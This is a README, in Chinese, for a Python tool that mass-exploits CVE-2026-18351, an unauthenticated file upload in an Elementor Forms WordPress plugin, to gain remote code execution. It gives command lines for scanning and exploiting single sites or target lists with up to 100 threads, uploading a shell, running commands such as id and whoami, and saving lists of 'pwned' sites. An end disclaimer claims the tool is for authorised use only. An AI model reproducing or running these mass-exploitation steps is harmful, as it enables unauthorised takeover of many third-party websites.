针对 CVE-2026-18351 的大规模利用工具 — Drag and Drop File Upload for Elementor Forms <= 1.6.0 中的未认证任意文件上传 → RCE。
致谢 johenlastgen | telegram @johenlastgen | 频道 @jlgnetworkredirect
无外部依赖 — 仅使用 Python 标准库。
python3 --version # 3.6+
# 单目标 — 仅被动检查(不上传)
python3 mass.py --url http://target.com --check
# 单目标 — 使用默认命令(id)进行利用
python3 mass.py --url http://target.com --cmd id
# 单目标 — 使用自定义命令进行利用
python3 mass.py --url http://target.com --cmd whoami
# 批量目标 — 被动检查
python3 mass.py --list targets.txt --threads 50 --check
# 批量目标 — 利用
python3 mass.py --list targets.txt --threads 50 --cmd id
# 批量目标 — 调整超时进行利用
python3 mass.py --list targets.txt --threads 100 --timeout 8 --cmd whoami
# 保存完整日志
python3 mass.py --list targets.txt --output results.txt
# 仅保存存在漏洞的目标
python3 mass.py --list targets.txt --output-vuln vuln.txt
# 仅保存已确认 RCE 的目标
python3 mass.py --list targets.txt --output-pwned pwned.txt
# 组合输出
python3 mass.py \
--list targets.txt \
--threads 50 \
--cmd id \
--output results.txt \
--output-vuln vuln.txt \
--output-pwned pwned.txt
| 选项 | 描述 |
|---|---|
--url | 单个目标 URL |
--list FILE | 包含目标 URL 的文件(每行一个) |
--check | 仅被动探测 — 不上传文件 |
--cmd CMD | 在 shell 上执行的命令(默认:id) |
--threads N | 并发线程数(默认:20) |
--timeout N | 每个请求的超时时间(秒)(默认:10) |
--output FILE | 将完整日志保存到文件 |
--output-vuln FILE | 仅将存在漏洞的目标 URL 保存到文件 |
--output-pwned FILE | 仅将已确认 RCE 的目标保存到文件 |
| 状态 | 含义 |
|---|---|
PWNED | Shell 已上传且 RCE 已确认 |
VULN-NO-EXEC | 上传被接受但 shell 执行失败 |
PATCHED | 上传被拒绝或未找到 nonce |
ERROR | 网络或解析失败 |
每行一个 URL。以 # 开头的行将被忽略。
http://target1.com
https://target2.com
# this line is ignored
http://target3.com
本项目仅供授权的安全评估、防御性安全研究和漏洞验证使用。
使用本软件即表示您确认已获得对目标系统进行评估的明确授权。未经授权访问计算机系统是被禁止的,并可能违反适用法律。
作者和贡献者不鼓励也不纵容对本项目的未经授权使用,并且对因其使用而导致的任何滥用、损害或法律后果不承担任何责任或义务。
JohenLastGen — JLG NETWORK